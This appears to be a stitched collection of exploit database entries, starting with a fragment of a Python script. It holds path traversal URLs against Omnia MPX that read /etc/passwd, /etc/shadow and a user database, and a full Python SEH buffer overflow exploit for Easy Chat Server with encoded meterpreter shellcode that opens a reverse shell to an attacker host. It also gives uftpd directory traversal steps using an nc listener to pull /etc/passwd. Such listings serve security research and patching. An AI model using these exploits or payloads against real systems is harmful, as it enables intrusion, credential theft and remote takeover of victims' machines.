requests.exceptions.MissingSchema,
requests.exceptions.InvalidURL,
requests.exceptions.InvalidSchema
):
print(
f"{settings.c1}{settings.i2}a valid schema and address "
f"must be supplied.{settings.c0}"
)
sys.exit()
if __name__ == "__main__":
main()
# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
# Date: 24/7/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.telosalliance.com/
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
# Version: 1.5.0+r1
# Tested on: MacOS
# PoC:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow
User Database:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python3
import sys
import socket
from struct import pack
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090) # short jump 6 bytes
seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode
shellcode = b"\x90" * 16
shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33"
shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6"
shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26"
shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f"
shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16"
shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a"
shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35"
shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21"
shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84"
shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90"
shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78"
shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9"
shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa"
shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e"
shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e"
shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e"
shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0"
shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0"
shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac"
shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43"
shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9"
shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2"
shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee"
shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6"
shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde"
shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b"
shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44"
buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n"
buffer += b"User-Agent: Mozilla/4.0\r\n"
buffer += b"Host: 192.168.1.136:80\r\n"
buffer += b"Accept-Language: en-us\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Referer: http://192.168.1.136\r\n"
buffer += b"Connection: Keep-Alive\r\n\r\n"
print("[*] Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
print("[+] Done!")
# Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated)
# Google Dork: N/A
# Exploit Author: Aaron Esau (arinerron)
# Vendor Homepage: https://github.com/troglobit/uftpd
# Software Link: https://github.com/troglobit/uftpd
# Version: 2.7 to 2.10
# Tested on: Linux
# CVE : CVE-2020-20277
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277
# Reference: https://arinerron.com/blog/posts/6
#Product: uftpd 2.7 to 2.10
#Proof-Of-Concept:
1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication.
#Steps
1-Setup nc listener on attacking machine on TCP port 1258
nc -lnvp 1258
2-Login to the FTP service
3-List files
ftp> ls ../../../
3-Set attacker's IP address and retrieve files
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd